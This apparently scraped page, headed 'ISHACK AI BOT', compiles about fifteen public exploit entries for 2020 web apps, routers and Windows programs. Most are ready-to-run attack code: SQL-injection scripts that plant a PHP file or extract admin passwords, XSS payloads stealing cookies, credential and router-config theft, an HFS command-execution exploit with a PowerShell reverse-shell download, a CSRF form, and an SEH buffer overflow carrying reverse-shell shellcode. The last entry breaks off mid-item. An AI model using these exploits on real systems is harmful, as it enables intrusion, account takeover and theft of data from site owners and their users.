ISHACK AI BOT

# Exploit Title: House Rental 1.0 - 'keywords' SQL Injection # Exploit Author: Bobby Cooke (boku) & Adeeb Shah (@hyd3sec) # Date: 2020-08-07 # Vendor Homepage: https://projectworlds.in # Software Link: https://projectworlds.in/wp-content/uploads/2019/06/home-rental.zip # Version: 1.0 # Tested On: Windows 10 Pro (x64_86) + XAMPP | Python 2.7 # CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') # OWASP Top Ten 2017: A1:2017-Injection # CVSS Base Score: 10.0 | Impact Subscore: 6.0 | Exploitability Subscore: 3.9 # CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H # Vulnerability Description: # House Rental v1.0 suffers from an unauthenticated SQL Injection vulnerability allowing remote attackers # to execute arbitrary code on the hosting webserver via sending a malicious POST request. # Vulnerable Source Code: # /config/config.php # 11 try { # 12 $connect = new PDO("mysql:host=".dbhost."; dbname=".dbname, dbuser, dbpass); # 13 $connect->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); # /index.php # 5 if(isset($_POST['search'])) { # 7 $keywords = $_POST['keywords']; # 11 $keyword = explode(',', $keywords); # 12 $concats = "("; # 13 $numItems = count($keyword); # 15 foreach ($keyword as $key => $value) { # 17 if(++$i === $numItems){ # 18 $concats .= "'".$value."'"; # 19 }else{ # 20 $concats .= "'".$value."',"; # 23 $concats .= ")"; # 47 $stmt = $connect->prepare("SELECT * FROM room_rental_registrations_apartment WHERE country IN $concats OR country IN $loc OR state IN $concats OR state IN $loc OR city IN $concats OR city IN $loc OR address IN $concats OR address IN $loc OR rooms IN $concats OR landmark IN $concats OR landmark IN $loc OR rent IN $concats OR deposit IN $concats"); # 48 $stmt->execute(); import requests, sys, re, json from colorama import Fore, Back, Style requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) F = [Fore.RESET,Fore.BLACK,Fore.RED,Fore.GREEN,Fore.YELLOW,Fore.BLUE,Fore.MAGENTA,Fore.CYAN,Fore.WHITE] S = [Style.RESET_ALL,Style.DIM,Style.NORMAL,Style.BRIGHT] ok = S[3]+F[2]+')'+F[5]+'+++'+F[2]+'['+F[8]+'========> '+S[0]+F[0] err = S[3]+F[2]+'<========'+F[2]+'('+F[5]+'+++'+F[2]+'( '+F[0]+S[0] def sig(): SIG = F[2]+" .-----.._ ,--. "+F[5]+" .__ .__________\n" SIG += F[2]+" | .. > "+F[4]+"___"+F[2]+" | | .--. "+F[5]+" | |__ ___.__. __| _\\_____ \\ ______ ____ ____\n" SIG += F[2]+" | |.' ,'"+F[4]+"-'"+F[2]+"* *"+F[4]+"'-."+F[2]+" |/ /__ __ "+F[5]+" | | < | |/ __ | _(__ < / ____/ __ _/ ___\\\n" SIG += F[2]+" | <"+F[4]+"/ "+F[2]+"* * *"+F[4]+" \\ "+F[2]+"/ \\/ \\ "+F[5]+" | Y \\___ / /_/ | / \\\\___ \\\\ ___\\ \\___\n" SIG += F[2]+" | |> ) "+F[2]+"* *"+F[4]+" / "+F[2]+"\\ \\ "+F[5]+" |___| / ____\____ |/______ /____ >\\___ \\___ >\n" SIG += F[2]+" |____..- "+F[4]+"'-.._..-'"+F[2]+"_|\\___|._..\\___\\"+F[5]+" \\/\\/ \\/ \\/ \\/ \\/ \\/\n" SIG += F[2]+" "+F[2]+"_______github.com/boku7_____ "+F[5]+" _______github.com/hyd3sec____\n_"+F[0]+S[0] return SIG def header(): head = S[3]+F[2]+' --- House Rental v1.0 | SQL Injection - Change Admin Password ---\n'+S[0] return head def formatHelp(STRING): return S[3]+F[2]+STRING+S[0] if __name__ == "__main__": print(header()) print(sig()) if len(sys.argv) != 2: print(err+formatHelp("Usage:\t python %s <WEBAPP_URL>" % sys.argv[0])) print(err+formatHelp("Example:\t python %s 'http://172.16.65.130/home-rental/'" % sys.argv[0])) sys.exit(-1) SERVER_URL = sys.argv[1] if not re.match(r".*/$", SERVER_URL): SERVER_URL = SERVER_URL+'/' INDEX_URL = SERVER_URL + 'index.php' EXECUTE_URL = SERVER_URL + 'execute.php' LOGIN_URL = SERVER_URL + 'auth/login.php' s = requests.Session() get_session = s.get(INDEX_URL, verify=False) pdata = {'keywords':'1337\') UNION SELECT all \'1,UPDATED,ADMIN,PASSWORD,TO,boku,aaaaaa,city,landmark,rent,deposit,plotnum,apartName,aptNum,rooms,floor,purpose,own,area,address,accomd,<?php require "config/config.php";$stmt=$connect->prepare("UPDATE users set password=\\\'17d8e2e8233d9a6ae428061cb2cdf226\\\' WHERE username=\\\'admin\\\'");$stmt->execute();?>,image,open,other,1,2020-08-01 14:42:11,2020-08-01 14:42:11,1\' into OUTFILE \'../../htdocs/home-rental/execute.php\' -- boku', 'location':'','search':'search'} SQLi = s.post(url=INDEX_URL, data=pdata, verify=False) if SQLi.status_code == 200: print(ok+"Sent "+F[2]+S[3]+"SQL Injection"+F[0]+S[0]+" POST Request to "+F[5]+S[3]+INDEX_URL+F[0]+S[0]+" with "+F[2]+S[2]+"payload"+F[0]+S[0]+":") print(S[3]+F[2]+json.dumps(pdata, sort_keys=True, indent=4)+F[0]+S[0]) else: print(err+'Cannot send payload to webserver.') sys.exit(-1) try: print(ok+"Executing "+F[2]+S[3]+"SQL Injection"+F[0]+S[0]+" payload to change "+F[2]+S[2]+"admin password"+F[0]+S[0]) EXECUTE = s.get(url=EXECUTE_URL, verify=False) except: print(err+'Failed to connect to '++F[2]+S[3]+EXECUTE_URL+F[0]+S[0]+'to execute payload') sys.exit(-1) print(ok+F[2]+S[3]+"SQL Injection payload executed!"+F[0]+S[0]) print(ok+F[2]+S[3]+"Login at "+F[5]+S[3]+LOGIN_URL+F[0]+S[0]+" with creds: "+F[2]+S[2]+"admin:boku"+F[0]+S[0])

# Exploit Title: ElkarBackup 1.3.3 - 'Policy[name]' and 'Policy[Description]' Stored Cross-site Scripting # Date: 2020-08-22 # Exploit Author: Vyshnav NK # Vendor Homepage: https://www.elkarbackup.org/ # Software Link: https://github.com/elkarbackup/elkarbackup/wiki/Installation # Version: 1.3.3 # Tested on: Linux Reproduction Steps: 1 - Go to the elakarbackup/login 2 - Login with default credentials 3 - Go to Policies >> Action >> Edit any of the existing Policies >> Insert XSS Payload in Paramter "Policy[name] and Policy[Description]" 4 - Click on Save 5 - We can see the Javacript Code executed Sucessfully XSS Attack vectors : "><svg/onload=alert(4)> "><svg/onload=alert(document.cookie)> Request : POST /policy/1 HTTP/1.1 Host: ip172-18-0-31-bt0bt4iosm4g00dvca80-8000.direct.labs.play-with-docker.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 1123 Origin: http://ip172-18-0-31-bt0bt4iosm4g00dvca80-8000.direct.labs.play-with-docker.com Connection: close Referer: http://ip172-18-0-31-bt0bt4iosm4g00dvca80-8000.direct.labs.play-with-docker.com/policy/1? Cookie: PHPSESSID=03e0bcfa5864ffe758916b5e171c1505 Upgrade-Insecure-Requests: 1 Policy%5Bname%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5Bdescription%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5BhourlyHours%5D=12%3A00%7C15%3A00%7C21%3A00&Policy%5BhourlyDaysOfMonth%5D=&Policy%5BhourlyDaysOfWeek%5D=1%7C2%7C3%7C4%7C5&Policy%5BhourlyMonths%5D=&Policy%5BhourlyCount%5D=0&Policy%5BdailyHours%5D=21%3A00&Policy%5BdailyDaysOfMonth%5D=&Policy%5BdailyDaysOfWeek%5D=1%7C2%7C3%7C4%7C5&Policy%5BdailyMonths%5D=&Policy%5BdailyCount%5D=5&Policy%5BweeklyHours%5D=21%3A00&Policy%5BweeklyDaysOfMonth%5D=&Policy%5BweeklyDaysOfWeek%5D=1&Policy%5BweeklyMonths%5D=&Policy%5BweeklyCount%5D=4&Policy%5BmonthlyHours%5D=21%3A00&Policy%5BmonthlyDaysOfMonth%5D=1&Policy%5BmonthlyDaysOfWeek%5D=&Policy%5BmonthlyMonths%5D=&Policy%5BmonthlyCount%5D=12&Policy%5ByearlyHours%5D=21%3A00&Policy%5ByearlyDaysOfMonth%5D=&Policy%5ByearlyDaysOfWeek%5D=&Policy%5ByearlyMonths%5D=&Policy%5ByearlyCount%5D=0&Policy%5Bexclude%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5Binclude%5D=%22%3E%3Csvg%2Fonload%3Dalert%284%29%3E&Policy%5BsyncFirst%5D=1&Policy%5B_token%5D=B6JELPCVSHiZrMvyEeeBdRMLYSKBWfUMUwBeLWw8XpI&weekly-day=on Response : <form data-bnv-message="Really delete policy "><svg/onload=alert(4)>?" class="delete-policy" action="/policy/1/delete" method="POST" style="display:inline">

# Exploit Title: ATX MiniCMTS200a Broadband Gateway 2.0 - Credential Disclosure # Date: 2020-11-20 # Exploit Author: Zagros Bingol # Vendor Homepage: http://www.atx.com # Software Link: https://atx.com/products/commercial-services-gateways/minicmts200a-broadband-gateway/ # Version: 2.0 and earlier # Tested on: Debian 10 64bit ------------------------------------- Endpoint: http://www.ip/domain.com/inc/user.ini -------------------------------------- Proof-of-Concept: #!/usr/bin/python3 #License: GNU General Public license v3.0 #Author: Zagros Bingol([email protected]) import requests import re target = input("Target(ex:http://host): \n") port = input("Port: \n") def sploit(target, port): print("ATX/PicoDigital MiniCMTS200a Broadband Gateway v2.0 - Credential Disclosure\n") r = requests.post(target + ":" + port + '/inc/user.ini') searching = re.findall(r"\[.{1,8}\]", str(r.text)) print("Usernames:\n") print(", ".join(searching).replace("[", "").replace("]", "")) def hash(): r = requests.post(target + '/inc/user.ini') searching = re.findall(r"([a-fA-F\d]{32})", str(r.text)) print("Hashes:\n") print(", ".join(searching).replace("[", "").replace("]", "")) hash() sploit(target, port)

# Exploit Title: Best Support System 3.0.4 - 'ticket_body' Persistent XSS (Authenticated) # Google Dork: "Powered By Best Support System" # Date: 2020-08-23 # Exploit Author: Ex.Mi [ https://ex-mi.ru ] # Vendor: Appsbd [ https://appsbd.com ] # Software Version: 3.0.4 # Software Link: https://codecanyon.net/item/best-support-systemclient-support-desk-help-centre/21357317 # Tested on: Kali Linux # CVE: CVE-2020-24963 # CWE: CWE-79 [i] :: Info: An Authenticated Persistent XSS vulnerability was discovered in the Best Support System, tested version — v3.0.4. [$] :: Payloads: 13"-->">'` -- `<!--<img src="--><img src=x onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);location=`https://ex-mi.ru`;> [!] :: PoC (Burp Suite POST request): POST /support-system/ticket-confirm/ticket-reply/11.html HTTP/1.1 Host: localhost Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 350 Origin: https://localhost Connection: close Referer: https://localhost/support-system/ticket/details/11.html Cookie: [cookies_here] app_form=8d1c319d5826a789b3ca3e71516b0c5c&ticket_body=%3Cp%3E%3Cbr%3E%3C%2Fp%3E13%22--%26gt%3B%22%26gt%3B'%60+--+%60%3C!--%3Cimg+src%3D%22--%3E%3Cimg+src%3D%22x%22+onerror%3D%22(alert)(%60Ex_Mi%60)%3B(alert)(document.cookie)%3Blocation%3D%60https%3A%2F%2Fex-mi.ru%60%3B%22%3E&status=&app_form_ajax=ad1ce2b2c3eb943efaa8c239ff53acc2

# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) # Google Dork: intext:"httpfileserver 2.3" # Date: 28-11-2020 # Remote: Yes # Exploit Author: Óscar Andreu # Vendor Homepage: http://rejetto.com/ # Software Link: http://sourceforge.net/projects/hfs/ # Version: 2.3.x # Tested on: Windows Server 2008 , Windows 8, Windows 7 # CVE : CVE-2014-6287 #!/usr/bin/python3 # Usage : python3 Exploit.py <RHOST> <Target RPORT> <Command> # Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')" import urllib3 import sys import urllib.parse try: http = urllib3.PoolManager() url = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}' print(url) response = http.request('GET', url) except Exception as ex: print("Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command") print(ex)

# Exploit Title: TypeSetter 5.1 - CSRF (Change admin e-mail) # Exploit Author: Alperen Ergel # Software Homepage: https://www.typesettercms.com/ # Version : 5.1 # Tested on: Kali & ubuntu # Category: WebApp ######## Description ######## Attacker can change admin e-mail address ## Vulnerable - Go to the admin page view preferences - Change the e-mail address ######## Proof of Concept ######## ===> REQUEST <==== POST /typesetter/Admin/Preferences HTTP/1.1 Host: http://localhost/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 237 Origin: http://localhost/ Connection: close Referer: http://localhost/typesetter/Admin/Preferences ## < SNIPP > verified=6cab21b263dafc079bc056b7e0f0610c37d1a5af46f252e24d537afa906baed776c370cb24709d8795842c0a86eb2d76e4300d529ebb5c0840fd5096c96c748c &email=demo%40mail.com&oldpassword=&password=&password1=&algo=password_hash&cmd=changeprefs&aaa=Save #### Attack Code #### <html> <body> <form action="http://localhost/typesetter/Admin/Preferences" method="POST"> <input type="hidden" name="verified" value="6cab21b263dafc079bc056b7e0f0610c37d1a5af46f252e24d537afa906baed776c370cb24709d8795842c0a86eb2d76e4300d529ebb5c0840fd5096c96c748c" /> <input type="hidden" name="email" value="[CHANGE HERE]" /> <input type="hidden" name="oldpassword" value="" /> <input type="hidden" name="password" value="" /> <input type="hidden" name="password1" value="" /> <input type="hidden" name="algo" value="password&#95;hash" /> <input type="hidden" name="cmd" value="changeprefs" /> <input type="hidden" name="aaa" value="Save" /> <input type="submit" value="Submit request" /> </form> </body> </html>

# Exploit Title: Intelbras Router RF 301K 1.1.2 - Authentication Bypass # Date: 27/11/2020 # Exploit Author: Kaio Amaral # Vendor Homepage: https://www.intelbras.com/pt-br/ # Software Link: http://backend.intelbras.com/sites/default/files/2020-10/RF301K_v1.1.2.zip # Version: firmware version 1.1.2 # Tested on: kali, android # POC # 1. nc host port, ex: nc 10.0.0.1 80 # 2. GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.0 # Python3 import socket from time import sleep def exploit(host, port=80): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) pay = "GET /cgi-bin/DownloadCfg/RouterCfm.cfg HTTP/1.0\n\n".encode() s.connect((host, port)) s.send(pay) sleep(0.2) data = s.recv(17576) if len(data) > 1000: print("[+] Success.") return data.decode() print("[-] Failed. ") exit() def file(data): with open("router.cfg", "w") as file: file.write(data[233:]) print("[+] File Successfully Written.") file(exploit("10.0.0.1"))

# Exploit Title: YATinyWinFTP - Denial of Service (PoC) # Google Dork: None # Date: 20.08.2020 # Exploit Author: strider # Vendor Homepage: https://github.com/ik80/YATinyWinFTP # Software Link: https://github.com/ik80/YATinyWinFTP # Tested on: Windows 10 ------------------------------[Description]--------------------------------- This Eyxploit connects to the FTP-Service and sends a command which has a size of 256bytes with an trailing space at the end. The result it crashes -----------------------------[Exploit]--------------------------------------------- #!/usr/bin/env python3 # -*- coding:utf-8 -*- import socket, sys target = (sys.argv[1], int(sys.argv[2])) buffer = b'A' * 272 + b'\x20' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(target) print(s.recv(1024)) s.send(buffer) s.close() -----------------------------[how to run]----------------------------- C:\> TinyWinFTP.exe servepath port ~$ python3 exploit.py targetip port Boom!

# Exploit Title: Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload # Google Dork: inurl:''com_gmapfp'' # Date: 2020-03-27 # Exploit Author: ThelastVvV # Vendor Homepage: https://gmapfp.org/ # Version:Version J3.5 /J3.5free # Tested on: Ubuntu # CVE: CVE-2020-23972 # Description: An attacker can access the upload function of the application without authenticating to the application and also can upload files due the issues of unrestricted file uploads which can be bypassed by changing the content-type and name file too double extensions # PoC: Version J3.5 http://127.0.0.1/index.php?option=com_gmapfp&controller=editlieux&tmpl=component&task=edit_upload -Once the attacker can locate the unauthenticated file upload form then the attacker can bypass the restriction by changing content-type and name file double extensions file.html.gif then can open file.html # Impact the attacker can upload malicious files can cause defacement of the site or uploading large amount of file til causes denial of service attack to Webapp/Server # Dir File Path: http://127.0.0.1///images/stories/gmapfp/test.html.gif http://127.0.0.1///images/stories/gmapfp/test.html http://127.0.0.1///images/gmapfp/test2.html.gif http://127.0.0.1///images/gmapfp/test2.html.gif # Issues are fixed,Please update to Last Version

# Title: Online Shopping Alphaware 1.0 - Error-Based SQL injection # Exploit Author: Moaaz Taha (0xStorm) # Date: 2020-08-20 # Vendor Homepage: https://www.sourcecodester.com/php/14368/online-shopping-alphaware-phpmysql.html # Software Link: https://www.sourcecodester.com/download-code?nid=14368&title=Online+Shopping+Alphaware+in+PHP%2FMysql# Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4 # Description This parameter "id" is vulnerable to Error-Based blind SQL injection in this path "/alphaware/details.php?id=431860" that leads to retrieve all databases. #POC sqlmap -u "http://192.168.1.55:8888/alphaware/details.php?id=431860" -p id --dbms=mysql --dbs --technique=E --threads=10

# Exploit Title: Wordpress Plugin EventON Calendar 3.0.5 - Reflected Cross-Site Scripting # Date: 27.11.2020 # Exploit Author: b3kc4t (Mustafa GUNDOGDU) # Vendor Homepage: https://www.myeventon.com/ # Version: 3.0.5 # Tested on: Ubuntu 18.04 # CVE : 2020-29395 # Description Link: https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS """ ~ VULNERABLITY DETAILS ~ https://target/addons/?q=<svg/onload=alert(/b3kc4t/)> # WordPress sites that use EventOn Calendar cause reflected xss vulnerability to javascript payloads injected into the search field. # The following python code will inject javascript code and print out url that will be sent to victim. If you use unicode caracters for xss , exploit will print page source. ##USAGE## $ sudo python eventon_exploit.py --exploit --url https://target/addons/?q= --payload '<svg/onload=alert(/b3kc4t/)>' ##OUTPUT## [+] https://target/addons/?q=<svg/onload=alert(/b3kc4t/)> """ import requests import sys import argparse from colorama import Fore def vuln_reflected(url, payload): s = requests.Session() get_request = s.get(url+payload) if get_request.status_code == 500: print(Fore.GREEN+"[-] COULD BE WAF, NOT BE REALIZED XSS INJECTION [-]") else: content_result = str(get_request.content) search_find = content_result.find(payload) if search_find != -1: print(Fore.GREEN+"[+] "+str(url)+str(payload)) else: print(content_result) def main(): desc = "Wordpress EventON Calendar Plugin XSS" parser = argparse.ArgumentParser(description=desc) exp_option = parser.add_argument_group('') parser.add_argument("--exploit", help ="", action='store_true') parser.add_argument("--url",help="", type=str, required=False) parser.add_argument("--payload",help="",type=str,required=False) args = parser.parse_args() if args.exploit: if args.url: if args.payload: url = args.url payload = args.payload vuln_reflected(url, payload) if name == 'main': main()

# Exploit Title: Pharmacy/Medical Store & Sale Point 1.0 - 'email' SQL Injection # Date: 2020-08-23 # Exploit Author: @naivenom # Vendor Homepage: https://www.sourcecodester.com/php/14398/pharmacymedical-store-sale-point-using-phpmysql-bootstrap-framework.html # Software Link: https://www.sourcecodester.com/download-code?nid=14398&title=Pharmacy%2FMedical+Store+%26+Sale+Point+Using+PHP%2FMySQL+with+Bootstrap+Framework # Version: 1.0 # Tested on: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4 This parameter "email" is vulnerable to Time-Based blind SQL injection in this path "/medical/login.php " that leads to retrieve all databases. #exploit import re import requests from bs4 import BeautifulSoup import sys import urllib3 import time urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # We can test the time based blind sqli with this script. This script testing with each character of the password column from users name table # and retrieve password from admin user. def time_based_blind_sqli(injection_string): target = "http://localhost:81/medical-store-source/login.php" for j in range(32,126): data = {'email': "%s" % (injection_string.replace("[CHAR]", str(j))), 'password':'xJXb', 'login':''} tim = time.time() r = requests.post(target,data = data, verify=False) nowtime = time.time() curren = nowtime-tim if curren <= 4: return j return None def main(): print("\n(+) Retrieving password from admin user...") # 5 is length of the password. This can # be dynamically stolen from the database as well! for i in range(1,5): injection_string = "[email protected]' AND (SELECT 1100 FROM (SELECT(SLEEP(4-(IF(ORD(MID((SELECT IFNULL(CAST(password AS NCHAR),0x20) FROM store.users ORDER BY password LIMIT 0,1),%d,1))>[CHAR],0,1)))))soLu) AND 'yHIV'='yHIV" % i extracted_char = chr(time_based_blind_sqli(injection_string)) sys.stdout.write(extracted_char) sys.stdout.flush() print("\n(+) done!") if __name__ == "__main__": main()

# Exploit Title: 10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH) # Date: 2020-09-02 # Exploit Author: Sectechs # Vendor Homepage: https://www.10-strike.com # Version: 8.65 # Tested on: Windows 7 x86 SP1 import os import sys import struct import socket crash ="A"* 209 # jmp short 8 # kali@root:msf-nasm_shell # nasm> jmp short 8 Next_SE_Pointer = "\xeb\x06\x90\x90" # 61e8497a SE_Handler="\x7a\x49\xe8\x61" # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.6.211 LPORT=5555 -f c -b "\x00" -e x86/alpha_mixed payload = ( "\xdb\xc3\xd9\x74\x24\xf4\x5e\x56\x59\x49\x49\x49\x49\x49\x49" "\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41" "\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42" "\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49" "\x6c\x59\x78\x6d\x52\x43\x30\x53\x30\x75\x50\x33\x50\x4f\x79" "\x69\x75\x34\x71\x69\x50\x32\x44\x4e\x6b\x32\x70\x64\x70\x6c" "\x4b\x76\x32\x54\x4c\x4e\x6b\x31\x42\x66\x74\x6c\x4b\x72\x52" "\x74\x68\x44\x4f\x48\x37\x42\x6a\x34\x66\x76\x51\x79\x6f\x6c" "\x6c\x77\x4c\x65\x31\x53\x4c\x74\x42\x64\x6c\x77\x50\x39\x51" "\x38\x4f\x74\x4d\x66\x61\x38\x47\x59\x72\x48\x72\x52\x72\x63" "\x67\x6c\x4b\x66\x32\x56\x70\x6c\x4b\x43\x7a\x45\x6c\x6c\x4b" "\x30\x4c\x76\x71\x43\x48\x4b\x53\x62\x68\x45\x51\x4b\x61\x43" "\x61\x4c\x4b\x73\x69\x57\x50\x37\x71\x68\x53\x4e\x6b\x52\x69" "\x36\x78\x6d\x33\x46\x5a\x43\x79\x4e\x6b\x35\x64\x4c\x4b\x77" "\x71\x5a\x76\x75\x61\x6b\x4f\x4e\x4c\x4b\x71\x58\x4f\x46\x6d" "\x65\x51\x5a\x67\x66\x58\x79\x70\x63\x45\x6a\x56\x75\x53\x63" "\x4d\x6c\x38\x45\x6b\x53\x4d\x54\x64\x32\x55\x4b\x54\x52\x78" "\x6e\x6b\x71\x48\x71\x34\x77\x71\x5a\x73\x55\x36\x6e\x6b\x56" "\x6c\x50\x4b\x4e\x6b\x50\x58\x55\x4c\x36\x61\x78\x53\x6c\x4b" "\x54\x44\x4e\x6b\x65\x51\x5a\x70\x6d\x59\x71\x54\x36\x44\x67" "\x54\x73\x6b\x51\x4b\x51\x71\x50\x59\x50\x5a\x62\x71\x79\x6f" "\x4b\x50\x73\x6f\x51\x4f\x63\x6a\x4e\x6b\x55\x42\x58\x6b\x4e" "\x6d\x53\x6d\x45\x38\x65\x63\x74\x72\x35\x50\x55\x50\x53\x58" "\x62\x57\x31\x63\x37\x42\x61\x4f\x36\x34\x33\x58\x32\x6c\x53" "\x47\x31\x36\x73\x37\x4b\x4f\x49\x45\x68\x38\x4c\x50\x56\x61" "\x33\x30\x57\x70\x44\x69\x68\x44\x76\x34\x30\x50\x32\x48\x67" "\x59\x6d\x50\x50\x6b\x73\x30\x39\x6f\x59\x45\x32\x70\x72\x70" "\x72\x70\x70\x50\x71\x50\x52\x70\x31\x50\x70\x50\x33\x58\x6a" "\x4a\x36\x6f\x49\x4f\x6b\x50\x69\x6f\x38\x55\x4a\x37\x33\x5a" "\x43\x35\x43\x58\x4f\x30\x6f\x58\x66\x66\x4e\x33\x73\x58\x46" "\x62\x35\x50\x32\x35\x4c\x73\x6d\x59\x38\x66\x62\x4a\x72\x30" "\x50\x56\x36\x37\x71\x78\x7a\x39\x59\x35\x42\x54\x35\x31\x79" "\x6f\x4b\x65\x4b\x35\x39\x50\x52\x54\x54\x4c\x69\x6f\x30\x4e" "\x47\x78\x52\x55\x38\x6c\x61\x78\x4c\x30\x58\x35\x79\x32\x33" "\x66\x79\x6f\x4a\x75\x72\x48\x35\x33\x52\x4d\x71\x74\x53\x30" "\x4d\x59\x59\x73\x51\x47\x50\x57\x70\x57\x75\x61\x78\x76\x33" "\x5a\x76\x72\x73\x69\x51\x46\x48\x62\x6b\x4d\x70\x66\x6b\x77" "\x47\x34\x57\x54\x37\x4c\x57\x71\x46\x61\x6e\x6d\x32\x64\x46" "\x44\x44\x50\x79\x56\x65\x50\x37\x34\x73\x64\x56\x30\x52\x76" "\x33\x66\x62\x76\x67\x36\x32\x76\x42\x6e\x56\x36\x32\x76\x62" "\x73\x43\x66\x45\x38\x51\x69\x78\x4c\x37\x4f\x6b\x36\x49\x6f" "\x58\x55\x4c\x49\x39\x70\x62\x6e\x73\x66\x71\x56\x39\x6f\x76" "\x50\x55\x38\x35\x58\x6c\x47\x47\x6d\x45\x30\x79\x6f\x69\x45" "\x6d\x6b\x78\x70\x6c\x75\x4c\x62\x73\x66\x35\x38\x69\x36\x7a" "\x35\x6d\x6d\x4d\x4d\x39\x6f\x5a\x75\x67\x4c\x67\x76\x51\x6c" "\x45\x5a\x4f\x70\x69\x6b\x39\x70\x54\x35\x36\x65\x6d\x6b\x33" "\x77\x56\x73\x43\x42\x30\x6f\x72\x4a\x65\x50\x62\x73\x49\x6f" "\x68\x55\x41\x41") buffer = crash + Next_SE_Pointer + SE_Handler + "\x90" * 20 + payload + "\x90" * 200 f=open("PoC6.txt","w") f.write(buffer) f.close() ''' ---------------------------------- | NEXT SEH Pointer | --|------ ESP | | < ------- A * 209 | |--------------------------------- | | | SE_Handler ▲ | | | | #POP #POP #RET | | | | | -------------------------------| | | ▼ Stack | | |______ ► ------------------------- | PAYLOAD | -------- ► call | KALI | __________________________ '''

# Exploit Title: Setelsa Conacwin 3.7.1.2 - Local File Inclusion # Date: 02/09/20 # Exploit Author: Bryan Rodriguez Martin AKA tr3mb0 # Vendor Homepage: http://setelsa-security.es/productos/control-de-acceso/ # Version: 3.7.1.2 # Tested on: Windows # FIX: The recommendation from the vendor is to update to the last version. import requests import urllib.parse import colorama from colorama import Fore, Style ENDPOINT = "http://10.4.8.11:8081/" while True: cmd = input(Fore.RED + "[*] FILE >> ") print(Style.RESET_ALL) #cmd = urllib.parse.quote(cmd) ENDPOINT2 = ENDPOINT + "..%2F..%2F" + cmd print("[*] Target >> " + ENDPOINT2) print(" ") r = requests.get(url = ENDPOINT2) extract = r.text print(extract)

# Exploit Title: Multi Restaurant Table Reservation System 1.0 - Multiple Persistent XSS # Date: 01-11-2020 # Exploit Author: yunaranyancat # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip # Version: 1.0 # Tested on: Ubuntu 18.04 + XAMPP 7.4.11 Summary: Multiple Persistent Cross-site Scripting in Multi Restaurant Table Reservation System allows attacker to gain sensitive information using these vulnerabilities. # POC No.1 Persistent XSS vulnerability at /dashboard/profile.php triggered by adding payload in Restaurant Name field ### Sample request POC #1 POST /TableReservation/dashboard/profile.php HTTP/1.1 Host: [TARGET URL/IP] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[TARGET URL/IP]/TableReservation/dashboard/profile.php Content-Type: application/x-www-form-urlencoded Content-Length: 122 Cookie: PHPSESSID=0095837d1f0f69aa6c35a0bf2f70193c DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 fullname=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&email=lol%40lol&phone=123456789&area=1&address=lol&password=lol&save=Save # POC No.2 Persistent XSS vulnerability at /dashboard/table-list.php triggered by adding payload in Table Name field in table-add.php ### Sample request POC #2 POST /TableReservation/dashboard/manage-insert.php HTTP/1.1 Host: [TARGET URL/IP] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[TARGET URL/IP]/TableReservation/dashboard/table-add.php Content-Type: multipart/form-data; boundary=---------------------------424640138424818065256966622 Content-Length: 321 Cookie: PHPSESSID=d464c277434e6f2cf4358f59a368b090 Connection: close Upgrade-Insecure-Requests: 1 -----------------------------424640138424818065256966622 Content-Disposition: form-data; name="tablename" <script>alert("XSS")</script> -----------------------------424640138424818065256966622 Content-Disposition: form-data; name="addtable" Add Table -----------------------------424640138424818065256966622-- # POC No. 3 Persistent XSS vulnerability at /dashboard/menu-list.php 